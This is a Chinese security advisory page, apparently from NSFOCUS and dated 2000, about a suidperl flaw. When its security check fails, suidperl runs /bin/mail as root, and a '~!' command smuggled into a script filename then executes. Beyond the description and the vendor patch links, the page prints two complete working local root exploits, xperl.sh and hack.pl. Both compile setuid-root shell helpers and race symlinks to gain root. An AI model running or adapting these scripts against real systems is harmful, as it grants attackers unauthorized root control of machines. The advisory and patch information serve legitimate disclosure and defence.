首页 -> 安全研究

安全研究

安全漏洞
SuidPerl调用/bin/mail漏洞

发布日期:2000-08-11
更新日期:2000-08-11

受影响系统:

    Larry Wall Perl 5.6
       + MandrakeSoft Linux Mandrake 7.1
    Larry Wall Perl 5.005_003
       + RedHat Linux 6.x
       + Turbo Linux
       + MandrakeSoft Linux Mandrake 7.0
       + MandrakeSoft Linux Mandrake 6.1
       + MandrakeSoft Linux Mandrake 6.0
       + Caldera eServer 2.3
       + Caldera eDesktop 2.4
       + Debian Linux 2.x
    Larry Wall Perl 5.005
    Larry Wall Perl 5.004_05
       + RedHat Linux 5.x

描述:

suidperl运行时会进行某些安全检查,当某个perl脚本设置了SUID却不是SUID-TO-ROOT时,
安全检查失败,suidperl调用/bin/mail向root发送类似下面内容的信息:

From: Bastard Operator <root@nimue.tpi.pl>
To: root@nimue.tpi.pl

User 500 tried to run dev 769 ino 343180 in place of dev 769 ino 343183!
(Filename of set-id script was /some/thing, uid 500 gid 500.)

Sincerely,
perl

企图被执行的脚本名字插入到邮件内容中,该名字取自argv[1]。此时suidperl并未
清空环境变量,也未放弃root权限,意味着/bin/mail以root权限被启动。/bin/mail
有一个未公开的特性,如果环境变量"interactive"值不为空,/bin/mail认为"~!"是
一个控制序列,此时即便当前进程没有附属终端,也会启动一个shell准备执行命令。

恶意用户创建一个脚本,其文件名带有控制序列以及准备执行的命令,suidperl安检
失败,结果导致/bin/mail启动了一个root shell并执行命令。

<* 来源:Sebastian Krahmer (krahmer@cs.uni-potsdam.de)
         Michal Zalewski   (lcamtuf@dione.ids.pl) *>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

============================ xperl.sh BEGIN ======================================
#!/bin/sh

#
#    -- PLEASE READ THESE COMMENTS CAREFULLY BEFORE TRYING ANYTHING --
#
# Wonderful, lovely, world-smashing, exciting perl exploit. It works against
# +s suidperl, exploiting undocumented /bin/mail feature when perl wants to
# notify root on inode race conditions. Currently, tested under RH Linux.
#
# What's probably most shocking, buggy code has following comment inside:
# /* heh, heh */. I guess author wasn't laughning last.
#
# Development history of this exploit is really funny. I found this condition
# about 4 months ago, but thought it's useless (who wants to notify root?).
# I deleted my test code and didn't left any notes on it. Then, month after
# this discovery, Sebastian contacted me. He was working on perl exploit.
# He told me he don't know how to cause this condition to happen, but
# if he realise how he can do it, he'll be able to use undocumented /bin/mail
# feature - environmental variable 'interactive', which, if set, causes
# /bin/mail to interpret ~! commands (subshell requests) even if stdin is not
# on terminal. And then I understood what I've done. I spent next month
# (yes! no kidding!) trying to recall what the fsck was the condition. I
# remembered it was trivial, even annoying... And finally, now I'm able to
# reconstruct it.
#
# This exploit tries to fit in rather short, but reasonable time window in
# order to exploit it. I tested it on fast, not overloaded Linux box, and
# I guess on slow machines it needs tunning. It needs anything setuid
# (/usr/bin/passwd is just fine), writable working directory and something
# around 4 minutes. Working directory should be mounted without noexec or
# nosuid options (if so, find something like /var/lib/svgalib etc).
#
# WARNING: On slow machines, it's quite possible this exploit will cause
# heavy load. Please test it when system is not overloaded and not used
# (eg. at night).
#
#
# I'd like to thank Sebastian Krahmer for his help (in fact, HE discovered it
# - I think I can say it without shame), and especially thank to several of
# my braincells that survived monitor radiation and made me recall this
# race condition.
#
# Send comments, ideas and flames to <lcamtuf@ids.pl>
# Tested with sperl 5.00503, but should work with any other as well.
#
# Good luck and don't abuse it.
#

clear

echo "Suidperl 5.00503 (and newer) root exploit"
echo "-----------------------------------------"
echo "Written by Michal Zalewski <lcamtuf@dione.ids.pl>"
echo "With great respect to Sebastian Krahmer..."
echo

SUIDPERL=/usr/bin/suidperl
SUIDBIN=/usr/bin/passwd

echo "[*] Using suidperl=$SUIDPERL, suidbin=$SUIDBIN..."

if [ ! -u $SUIDPERL ]; then
  echo "[-] Sorry, $SUIDPERL4 is NOT setuid on this system or"
  echo "    does not exist at all. If there's +s perl binary available,"
  echo "    please change SUIDPERL variable within exploit code."
  echo
  exit 0
fi


if [ ! -u $SUIDBIN ]; then
  echo "[-] Sorry, $SUIDBIN is NOT setuid on this system or does not exist at"
  echo "    all. Please pick any other +s binary and change SUIDBIN variable"
  echo "    within exploit code."
  echo
  exit 0
fi

echo "[+] Checks passed, compiling flares and helper applications..."
echo

cat >flare <<__eof__
#!/usr/bin/suidperl

print "Nothing can stop me now...\n";

__eof__

cat >bighole.c <<__eof__
main() {
  setuid(0);
  setgid(0);
  chown("sush",0,0);
  chmod("sush",04755);
}
__eof__

cat >sush.c <<__eof__
main() {
  setuid(0);
  setgid(0);
  system("/bin/bash");
}
__eof__

make bighole sush

echo

if [ ! -x ./sush ]; then
  echo "[-] Oops, seems to me I cannot compile helper applications. Either"
  echo "    you don't have working 'make' or 'gcc' utility. If possible,"
  echo "    please compile bighole.c and sush.c manually (to bighole and sush)."
  echo
  exit 0
fi

echo "[+] Setting up environment..."

chmod 4755 ./flare

FILENAME='none

~!bighole

'
export interactive=1
PATH=.:$PATH

echo "[+] Starting exploit. It could take up to 5 minutes in order to get"
echo "[+] working root shell. WARNING - WARNING - WARNING: it could cause"
echo "[+] heavy system load."

while :; do
  ( ln -f -s $SUIDBIN "$FILENAME";usleep $RANDOM; nice -n +20 $SUIDPERL ./"$FILENAME" <./flare & ) &>/dev/null &
  ( usleep $RANDOM ; ln -f -s /dev/stdin "$FILENAME" ) &>/dev/null &
  if [ -u ./sush ]; then
    echo
    echo "[+] VOILA, BABE :-) Entering rootshell..."
    echo
    rm -f "$FILENAME" sush.c bighole bighole.c flare
    ./sush
    echo
    echo "[+] Thank you for using Marchew Industries / dupa.ryba products."
    echo
    rm -f "$FILENAME" sush.c bighole bighole.c flare sush
    exit 0
  fi
done
============================ xperl.sh END ======================================

============================ hack.pl BEGIN ======================================
#!/usr/bin/perl

# In spring 2000 i got a pointer from Dave Dittrich that my own perl-script
# that i used for my EoE IDS used /bin/mail in an insecure way. However,
# Dave told me that it is propably not exploitable. Some month later
# i noticed that suidperl uses the same way to log intrusion-attempts.
# I patched perl.c so that i could test the vuln without the race. After some
# hard nights i found, that it was possible. The thing that made the exploit possible
# was mail's hidden feature 'interactive'. I contacted some friends and
# we all agreed that the exploit wouldn't be the easiest. However, after contacting
# Michal too, he showed that we have been wrong. :)
# Michal wrote the first exploit (shell-script) but it failed on my BSD box.
# So i ported it to perl. Below the initial comment from his exploit:


#
#    -- PLEASE READ THESE COMMENTS CAREFULLY BEFORE TRYING ANYTHING --
#
# Wonderful, lovely, world-smashing, exciting perl exploit. It works against
# +s suidperl, exploiting undocumented /bin/mail feature when perl wants to
# notify root on inode race conditions. Currently, tested under RH Linux.
#
# What's probably most shocking, buggy code has following comment inside:
# /* heh, heh */. I guess author wasn't laughning last.
#
# Development history of this exploit is really funny. I found this condition
# about 4 months ago, but thought it's useless (who wants to notify root?).
# I deleted my test code and didn't left any notes on it. Then, month after
# this discovery, Sebastian contacted me. He was working on perl exploit.
# He told me he don't know how to cause this condition to happen, but
# if he realise how he can do it, he'll be able to use undocumented /bin/mail
# feature - environmental variable 'interactive', which, if set, causes
# /bin/mail to interpret ~! commands (subshell requests) even if stdin is not
# on terminal. And then I understood what I've done. I spent next month
# (yes! no kidding!) trying to recall what the fsck was the condition. I
# remembered it was trivial, even annoying... And finally, now I'm able to
# reconstruct it.
#
# This exploit tries to fit in rather short, but reasonable time window in
# order to exploit it. I tested it on fast, not overloaded Linux box, and
# I guess on slow machines it needs tunning. It needs anything setuid
# (/usr/bin/passwd is just fine), writable working directory and something
# around 4 minutes. Working directory should be mounted without noexec or
# nosuid options (if so, find something like /var/lib/svgalib etc).
#
# WARNING: On slow machines, it's quite possible this exploit will cause
# heavy load. Please test it when system is not overloaded and not used
# (eg. at night).
#
#
# I'd like to thank Sebastian Krahmer for his help (in fact, HE discovered it
# - I think I can say it without shame), and especially thank to several of
# my braincells that survived monitor radiation and made me recall this
# race condition.
#
# Send comments, ideas and flames to <lcamtuf@ids.pl>
# Tested with sperl 5.00503, but should work with any other as well.
#
# Good luck and don't abuse it.
#

# The warnings also apply to this program. FOR EDUCATIONAL PURPOSES ONLY!!!
# Greetings as usual: You all know who you are :))
# S.

sub REAPER
{
    while (waitpid(-1, WNOHANG) > 0) {
    }
}

$SIG{CHLD} = \&REAPER;

print "\n\nSuidperl 5.00503 (and newer) root exploit\n".
      "-----------------------------------------\n".
      "Bugdiscovery & Exploit by Sebastian Krahmer <krahmer\@cs.uni-potsdam.de>\n".
      "With [even greater] respect to Michal Zalewski, who wrote the first exploit!\n\n";

$suidperl = `which suidperl`;

if ((stat($suidperl))[2] & 04000 != 04000) {
    print "No +s suidperl found.\n Aborting.\n";
    return;
}

print "Your choice is $suidperl\n";

print "When you need to quit this program, just type\n".
      "'killall -9 hack.pl' on a second console.\n\n";

chdir("/tmp");
open O, ">flare1" or die "$!";
print O<<_EOF_;
#!/usr/bin/suidperl

print "I know!\n";
_EOF_

close O;

open O, ">flare2" or die "$!";
print O<<_EOF_;
#!/usr/bin/suidperl

print "I know!";
_EOF_

close O;


open O,">littlehole.c" or die "$!";
print O<<_EOF_;
int main()
{
    setuid(0);
    setgid(0);
    chown("boomsh", 0, 0);
    chmod("boomsh", 06755);
    return 0;
}
_EOF_
close O;


open O, ">boomsh.c" or die "$!";
print O<<_EOF_;
int main()
{
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}

_EOF_
close O;

chmod 04700, "flare1" or die "$!";
chmod 04700, "flare2" or die "$!";

`cc -o boomsh boomsh.c`;
`cc -o littlehole littlehole.c`;

print "OK. All pre-race stuff done. Starting race ...\n".
      "Please be patient. It can take some minutes.\n".
      "You can safely ignore error-messages like 'No such file ...'\n";


$filename = 'foo

~!littlehole

';

$ENV{interactive}=1;
$ENV{PATH}.= ":.";

$p = $$;

fork();

fork();
fork();

# maybe comment this out if box is slow
fork();
#fork();

# the idea is simple (hey, i dont know why i didn't got this
# idea before Michal! :)
# We just fork off some suidperls with 2 different
# inputfiles. Then the bruting change of symlinks will
# hopefully hit on of the suidperl's race.
# chances are good.
while (((stat("boomsh"))[2] & 04000) != 04000) {
        unlink($filename);
        symlink("/tmp/flare1", $filename);
        
        system("nice -20 \"$filename\">/dev/null &");
        
        unlink($filename);
        symlink("/tmp/flare2", $filename);
        
        system("nice -20 \"$filename\">/dev/null &");
}

print "OK. /tmp/boomsh is setuid root!\n";

# the first one wins the prize :)
if ($p != $$) {
    exit(0);
}

system("/tmp/boomsh");

============================ hack.pl END ======================================



建议:

[ RedHat Linux ]
Red Hat Linux 5.0:
Red Hat Linux 5.2:

sparc:
ftp://updates.redhat.com/5.2/sparc/mailx-8.1.1-16.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/perl-5.004m7-2.sparc.rpm

alpha:
ftp://updates.redhat.com/5.2/alpha/mailx-8.1.1-16.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/perl-5.004m7-2.alpha.rpm

i386:
ftp://updates.redhat.com/5.2/i386/mailx-8.1.1-16.i386.rpm
ftp://updates.redhat.com/5.2/i386/perl-5.004m7-2.i386.rpm

源码:
ftp://updates.redhat.com/5.2/SRPMS/mailx-8.1.1-16.src.rpm
ftp://updates.redhat.com/5.2/SRPMS/perl-5.004m7-2.src.rpm

Red Hat Linux 6.2:

sparc:
ftp://updates.redhat.com/6.2/sparc/mailx-8.1.1-16.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/perl-5.00503-11.sparc.rpm

i386:
ftp://updates.redhat.com/6.2/i386/mailx-8.1.1-16.i386.rpm
ftp://updates.redhat.com/6.2/i386/perl-5.00503-11.i386.rpm

alpha:
ftp://updates.redhat.com/6.2/alpha/mailx-8.1.1-16.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/perl-5.00503-11.alpha.rpm

源码:
ftp://updates.redhat.com/6.2/SRPMS/mailx-8.1.1-16.src.rpm
ftp://updates.redhat.com/6.2/SRPMS/perl-5.00503-11.src.rpm

[ Caldera Linux ]
Caldera RPM perl-5.005_03-6S.i386
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/perl-5.005_03-6S.i386.rpm
eServer 2.3 i386

Caldera RPM perl-add-5.005_03-6S.i386
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/perl-add-5.005_03-6S.i386.rpm
eServer 2.3 i386

Caldera RPM perl-examples-5.005_03-6S.i386
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/perl-examples-5.005_03-6S.i386.rpm
eServer 2.3 i386

Caldera RPM perl-man-5.005_03-6S.i386
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/perl-man-5.005_03-6S.i386.rpm
eServer 2.3 i386

Caldera RPM perl-pod-5.005_03-6S.i386
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/perl-pod-5.005_03-6S.i386.rpm
eServer 2.3 i386

Caldera RPM perl-5.005_03-6.i386
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/perl-5.005_03-6.i386.rpm
eDesktop 2.4 i386

Caldera RPM perl-add-5.005_03-6.i386
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/perl-add-5.005_03-6.i386.rpm
eDesktop 2.4 i386

Caldera RPM perl-examples-5.005_03-6.i386
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/perl-examples-5.005_03-6.i386.rpm
eDesktop 2.4 i386

Caldera RPM perl-man-5.005_03-6.i386
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/perl-man-5.005_03-6.i386.rpm
eDesktop 2.4 i386

Caldera RPM perl-pod-5.005_03-6.i386
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/perl-pod-5.005_03-6.i386.rpm
eDesktop 2.4 i386

[ Mandrake Linux ]

Mandrake RPM 7.1: perl-5.600-5mdk.i586
ftp://ftp.linux.tucows.com/pub/distributions/Mandrake/Mandrake/updates/7.1/RPMS/perl-5.600-5mdk.i586.rpm
MD5 checksum: 39a43d7f8449a692e11fa384343dc939

Mandrake RPM 7.1: perl-base-5.600-5mdk.i586
ftp://ftp.linux.tucows.com/pub/distributions/Mandrake/Mandrake/updates/7.1/RPMS/perl-base-5.600-5mdk.i586.rpm
MD5 checksum: 025428ebc98430c138979f9cd3f1bdb8

Mandrake RPM 7.0: perl-base-5.00503-11mdk.i586
ftp://ftp.linux.tucows.com/pub/distributions/Mandrake/Mandrake/updates/7.0/RPMS/perl-base-5.00503-11mdk.i586.rpm
MD5 Checksum: 7b699435cc912993d21f4b35f780b366

Mandrake RPM 7.0: perl-5.00503-11mdk.i586
ftp://ftp.linux.tucows.com/pub/distributions/Mandrake/Mandrake/updates/7.0/RPMS/perl-5.00503-11mdk.i586.rpm
MD5 checksum: 054c9b11a79651d742a465f8ca15a0e8

Mandrake RPM 6.1: perl-5.00503-5mdk.i586
ftp://ftp.linux.tucows.com/pub/distributions/Mandrake/Mandrake/updates/6.1/RPMS/perl-5.00503-5mdk.i586.rpm
MD5 checksum: cfdba31ce88d7a72f00ae2f27d4596db

Mandrake RPM 6.0: perl-5.00503-5mdk.i586
ftp://ftp.linux.tucows.com/pub/distributions/Mandrake/Mandrake/updates/6.0/RPMS/perl-5.00503-5mdk.i586.rpm
MD5 Checksum: 1c42a4a20c7c042f78ae846cc9bfdc81

[ Turbo Linux ]
TurboLinux RPM 4.x: perl-5.00503-7.i386
ftp://ftp.turbolinux.com/pub/updates/4.0/security/perl-5.00503-7.i386.rpm
MD5 checksum: dd1d17422817d40be46d730f1ce8d41e

TurboLinux RPM 6.x: perl-5.005_02-8TL.i386
ftp://ftp.turbolinux.com/pub/updates/6.0/security/perl-5.005_02-8TL.i386.rpm
MD5 checksum: 2951099587eabb3de107ee147619a34b



浏览次数:7056
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障